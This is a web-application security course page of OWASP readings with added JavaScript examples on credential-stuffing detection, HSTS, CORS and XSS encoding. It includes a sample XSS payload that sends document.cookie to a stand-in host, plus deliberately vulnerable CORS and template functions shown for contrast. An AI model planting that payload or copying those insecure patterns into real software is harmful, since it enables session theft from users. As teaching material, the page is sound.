1 Security Topics: Readings and References
Under Construction, subject to change
- Networking, Protocols, Servers and Security
- TLS, HTTPS
- Sessions, security, certificates, cookies, tokens, tracking
2 HTTPS, TLS, and Certificates
Minimal Crypto basics: single key encryption, public key encryption, secure hashes, secure random numbers. No number theory...
TLS and HTTPS basics
Certificate tutorial: website certificates, other uses for certificates.
To be reviewed: Painless Self Signed Certificates in node.js
3 Web Application security
A good source of information is the Open Web Application Security Project (OWASP). However, finding the "good stuff" on their wiki can be difficult. One place to go for very practical advice is their Cheat Sheet Series.
3.1 Top Threats
The OWASP Top 10 (2017 edition), annotated with what this course will cover:
- A1: Injection (will cover)
- A2: Broken Authentication (will cover)
- A3: Sensitive Data Exposure
- A4: XML External Entities (XXE) (not applicable to us)
- A5: Broken Access Control
- A6: Security Misconfiguration (will not cover)
- A7: Cross-Site Scripting (XSS) (particularly relevant to us)
- A8: Insecure Deserialization
- A9: Using Components with Known Vulnerabilities (will not cover)
- A10: Insufficient Logging & Monitoring (will not cover)
3.3 Broken Authentication
Authentication Cheat Sheet. The introduction defines authentication and relates it to session management.
Credential stuffing is the automated injection of breached username/password pairs (typically leaked from other sites) to identify accounts on the target system whose owners reused the same credentials. Unlike a brute-force attack on one account, it makes only one or two attempts per account across many accounts, so per-account lockout alone does not stop it.
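As an added worked example (not from the cheat sheet or this page), the following JavaScript tells credential stuffing apart from single-account brute force in authentication logs. The log format, the sample lines and the thresholds are all constructed for the demo; real logs will need their own parser.

```javascript
// Added example: classify login-failure patterns per source IP.
// SAMPLE_LOG is constructed data in an assumed format, not real logs.
const SAMPLE_LOG = [
  // one source cycling through many accounts, one try each: stuffing
  "2024-05-01T10:00:01Z ip=203.0.113.7 user=alice result=fail",
  "2024-05-01T10:00:02Z ip=203.0.113.7 user=bob result=fail",
  "2024-05-01T10:00:02Z ip=203.0.113.7 user=carol result=fail",
  "2024-05-01T10:00:03Z ip=203.0.113.7 user=dave result=success", // reused password hit
  "2024-05-01T10:00:03Z ip=203.0.113.7 user=erin result=fail",
  "2024-05-01T10:00:04Z ip=203.0.113.7 user=frank result=fail",
  "2024-05-01T10:00:04Z ip=203.0.113.7 user=grace result=fail",
  // one source hammering one account: brute force
  "2024-05-01T10:01:00Z ip=198.51.100.9 user=alice result=fail",
  "2024-05-01T10:01:01Z ip=198.51.100.9 user=alice result=fail",
  "2024-05-01T10:01:02Z ip=198.51.100.9 user=alice result=fail",
  "2024-05-01T10:01:03Z ip=198.51.100.9 user=alice result=fail",
  "2024-05-01T10:01:04Z ip=198.51.100.9 user=alice result=fail",
  "2024-05-01T10:01:05Z ip=198.51.100.9 user=alice result=fail",
  // a legitimate user who mistyped once
  "2024-05-01T10:02:00Z ip=192.0.2.5 user=heidi result=fail",
  "2024-05-01T10:02:10Z ip=192.0.2.5 user=heidi result=success",
];

// Parse one line of the assumed format; returns null for lines that don't match.
function parseLine(line) {
  const m = /^(\S+) ip=(\S+) user=(\S+) result=(\S+)$/.exec(line);
  return m ? { ts: m[1], ip: m[2], user: m[3], result: m[4] } : null;
}

// Stuffing: one source, many distinct accounts, few attempts each (the attacker
// already holds a candidate password). Brute force: one account, many attempts.
// Successes during a stuffing run are the accounts that actually reused a
// breached password and need forced resets.
function classifySources(lines, { minDistinctUsers = 5, minFailuresPerUser = 5 } = {}) {
  const perIp = new Map();
  for (const line of lines) {
    const e = parseLine(line);
    if (!e) continue;
    if (!perIp.has(e.ip)) {
      perIp.set(e.ip, { users: new Set(), failures: new Map(), successes: new Set() });
    }
    const s = perIp.get(e.ip);
    s.users.add(e.user);
    if (e.result === "fail") s.failures.set(e.user, (s.failures.get(e.user) || 0) + 1);
    else if (e.result === "success") s.successes.add(e.user);
  }
  const findings = [];
  for (const [ip, s] of perIp) {
    if (s.users.size >= minDistinctUsers) {
      findings.push({ ip, kind: "credential-stuffing", accountsTried: s.users.size,
                      compromised: [...s.successes].sort() });
      continue;
    }
    for (const [user, n] of s.failures) {
      if (n >= minFailuresPerUser) findings.push({ ip, kind: "brute-force", user, failures: n });
    }
  }
  return findings;
}
```

Per-IP counting is the simplest signal and the easiest to evade: real stuffing runs rotate through proxy pools so each address makes only a handful of attempts. The complementary signals are a site-wide spike in the failure rate and checking submitted passwords against known-breached lists at login and password-change time.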
3.4 Sensitive Data Exposure
Transport Layer Protection Cheat Sheet. All about correctly using TLS, including for HTTPS.
User Privacy Protection Cheat Sheet. Focuses on the privacy and anonymity threats that users face when using online services, especially social networking and communication platforms.
Password Storage Cheat Sheet. Important!
Protecting data at rest: an architectural decision must be made to determine the appropriate method to protect data at rest.
This is a general computer security problem, so it belongs in a computer security class rather than here.
HTTP Strict Transport Security (HSTS) is an opt-in security enhancement that a web application requests through the Strict-Transport-Security response header. Once a supporting browser has received this header over HTTPS (browsers ignore it when it arrives over plain HTTP), it will refuse to send any request to that domain over HTTP for the stated max-age, upgrading them to HTTPS instead, and it will no longer let the user click through certificate warnings for that domain.
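As an added example (not from the cheat sheet or this page), here is HSTS handling for a Node.js app written as Express-style middleware. The (req, res, next) shape is Express's; TRUST_PROXY and CANONICAL_HOST are assumptions about the deployment.

```javascript
// Added example: redirect plain HTTP, then set HSTS on the HTTPS response.
const ONE_YEAR = 31536000;                 // seconds; one year is a common max-age
const TRUST_PROXY = true;                  // assumption: TLS terminated by a proxy we control
const CANONICAL_HOST = "www.example.com";  // assumption; never echo the client's Host header
                                           // into a redirect, or you get an open redirect

// Build the header value. includeSubDomains defaults on because one insecure
// subdomain can leak a cookie scoped to the parent domain.
function hstsValue({ maxAge = ONE_YEAR, includeSubDomains = true, preload = false } = {}) {
  let v = `max-age=${maxAge}`;
  if (includeSubDomains) v += "; includeSubDomains";
  if (preload) v += "; preload";
  return v;
}

// Was this request made over TLS? Only honour X-Forwarded-Proto when a trusted
// proxy sets it: a client can send that header itself over plain HTTP.
function requestIsHttps(req) {
  if (req.secure) return true;
  if (TRUST_PROXY) return req.headers["x-forwarded-proto"] === "https";
  return false;
}

// Browsers ignore Strict-Transport-Security received over plain HTTP, so the
// header goes only on the HTTPS response; the HTTP side just redirects.
function hstsDecision(req) {
  if (!requestIsHttps(req)) {
    return { action: "redirect", status: 301, location: `https://${CANONICAL_HOST}${req.url}` };
  }
  return { action: "header", value: hstsValue() };
}

function hstsMiddleware(req, res, next) {
  const d = hstsDecision(req);
  if (d.action === "redirect") {
    res.writeHead(d.status, { Location: d.location });
    return res.end();
  }
  res.setHeader("Strict-Transport-Security", d.value);
  next();
}
```

Set preload only once every subdomain serves HTTPS; a preload-list entry is hard to undo, and a single HTTP-only subdomain becomes unreachable once browsers ship it.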
3.5 Access Control
Authorization is the process of deciding whether a request to access a particular resource should be granted or denied. Note that authorization is not the same as authentication; the two terms are frequently confused. Authentication is providing and validating identity. Authorization is the set of rules that determine what functionality and data a user (or principal) may access, ensuring the proper allocation of access rights after authentication has succeeded.
Browser protection mechanism: Cross-Origin Resource Sharing (CORS). CORS is the browser's mechanism for relaxing the same-origin policy so that script running on one origin may read responses from another; the server opts in per origin through Access-Control-* response headers. It also comes up as a "hassle" during development, typically when a front end on one origin calls an API on another, and the tempting quick fix (allowing every origin) is a security hole.
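As an added example (not from the cheat sheet or this page), the following shows a server-side CORS decision for an API that uses cookie or bearer credentials, next to the reflect-the-Origin shortcut that developers reach for when the browser rejects a wildcard. The origins in ALLOWED_ORIGINS are assumptions.

```javascript
// Added example: CORS allow-list versus Origin reflection. Origins are assumed.
const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",
  "https://admin.example.com",
]);

// Response headers for a request's Origin, or null when none should be sent (the
// browser then blocks the page from reading the response). Match exactly: prefix,
// suffix or regex tests are how allow-lists get bypassed, e.g.
// "https://app.example.com.attacker.test" passing a startsWith check.
function corsHeadersFor(origin) {
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return null; // also rejects "Origin: null"
  return {
    "Access-Control-Allow-Origin": origin,       // echo only a value we have vetted
    "Access-Control-Allow-Credentials": "true",
    "Access-Control-Allow-Methods": "GET, POST, PUT, DELETE",
    "Access-Control-Allow-Headers": "Content-Type, Authorization",
    "Vary": "Origin",                            // caches must not reuse one origin's answer for another
  };
}

// The development "hassle" fix that is a vulnerability: browsers refuse "*"
// together with credentials, so people echo whatever Origin arrives. Any site a
// logged-in victim visits can then make credentialed requests and read the answers.
function corsHeadersReflecting(origin) {
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Preflight (OPTIONS) handling: 204 with the headers, or 403 with none at all.
function handlePreflight(origin) {
  const headers = corsHeadersFor(origin);
  return headers ? { status: 204, headers } : { status: 403, headers: {} };
}
```

CORS only governs what a browser lets a page read; the request itself still reaches the server, so it is not a substitute for the server-side authorization checks discussed above.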
3.6 Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. An XSS attack occurs when an attacker uses a web application to deliver malicious code, generally a browser-side script, to a different end user. The flaws that make these attacks possible are widespread: they occur anywhere a web application places user-supplied input into the output it generates without validating it or encoding it for that output context.
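As an added example (not from OWASP or this page), here is the flaw just described in its simplest form, a template that concatenates user input into HTML, beside the output-encoding fix. The render functions, the payload and containsScriptTag are constructed for the demo.

```javascript
// Added example: reflected XSS via string concatenation, and HTML output encoding.

// Vulnerable: user input goes straight into the markup.
function renderGreetingUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Encode the five characters that can change meaning inside an HTML text node or a
// double-quoted attribute value. Encoding at output time, for the HTML context, is
// the primary XSS defence; input validation alone does not suffice.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Fixed: same template, input encoded for the context it lands in.
function renderGreetingSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// Demo check only (not a sanitiser): did a <script> tag survive rendering?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload: a session-stealing script of the kind an attacker would
// plant in a name field or a URL parameter that the page echoes back.
const PAYLOAD = '<script>document.location="https://evil.test/?c="+document.cookie</script>';
```

escapeHtml is correct only for HTML text and quoted attribute values. Input placed inside a script block, an event-handler attribute, a URL or a CSS value needs that context's encoder instead, which is why the OWASP cheat sheets organise the rules by output context.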
3.7 Also of Interest
4 Browser Security Features
Mostly opt-in protections that a site requests through HTTP response headers, HSTS (above) being one example...